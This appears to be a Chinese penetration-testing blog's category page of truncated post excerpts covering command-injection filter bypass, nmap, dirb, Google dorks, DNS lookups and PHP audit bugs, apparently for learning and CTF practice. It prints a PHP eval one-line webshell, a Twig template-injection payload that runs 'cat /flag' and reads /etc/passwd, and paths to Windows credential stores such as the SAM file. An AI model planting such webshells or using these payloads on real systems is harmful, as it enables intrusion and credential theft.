分类 - 渗透测试

命令执行绕过拼接符号过滤在linux中，&和&&,|和||介绍如下： & 表示任务在后台执行，如要在后台运行redis-server,则有 redis-server & && 表示前一条命令执行成功时，才执行后一条命令 ，如 echo '1

PHP一句话木马经典语句<?php @eval($_POST['cmd']);?>其中:(1) @ 为错误抑制符号(2) eval 执行php代码(3) $_POST['cmd'] 通过post接收的数据意思为eval把接受的数据当做php代码执行其他函数create_function

phptwig{{self.env.registerUndefinedFilterCallback("exec")}}{{self.env.getFilter("cat /flag")}}{{'/etc/passwd'|file_excerpt(1,30)}}

常见的敏感信息路径Windows系统c:\boot.ini // 查看系统版本c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件c:\windows\repair\sam // 存储Windows系统初次安装的密码c:\ProgramFiles\m

谷歌语法intitle搜索关键词（intitle:variation）只搜索网页标题含有关键词的页面。inurl搜索关键词（intitle:variation）只搜索网页链接含有关键词的页面。intext搜索关键词（intext:variation）只搜索网页body标签中的文本含有关键词的页面。s

nmap常用命令nmap -sS -sV -p- xxx.xxx.xxx.xxxnmap -v -T4 -A xxx.xxx.xxx.xxxnmap -sT 192.168.96.4  //TCP连接扫描，不安全，慢nmap -sS 192.168.96.4  //SYN扫描,使用最频繁，安全，快n

dirb简介dirb是一个基于字典的web目录扫描工具，会用递归的方式来获取更多的目录，它还支持代理和http认证限制访问的网站参数格式：dirb <url_base> [<wordlist_file(s)>] [options]-a 设置user-agent-p <p

子域名查找digdig命令说明查询DNS包括NS记录，A记录，MX记录等相关信息的工具。DNS 记录的类型说明类型A记录: A记录是指定域名对应的IP地址。类型AAAA记录：该记录是将域名解析到一个指定的IPV6的IP上类型CNAME记录：通常称别名解析。可以将注册的不同域名都转到一个域名记录上，由

php代码审计php配置   register_globals简介该选项设置为on的情况下，会直接把用户GET、POST等方式提交上来的参数注册成全局变量并初始化值为参数对应的值版本<=4.2.3 设置为php_ini_all=5.3.0 被废弃=5.4 移除该项示例<?phpi

php处理0e开头md5时的hash字符串漏洞<?phprequire_once "flag.php";if (!isset($_GET['user']) && !isset($_GET['pass'])) { header("Locatio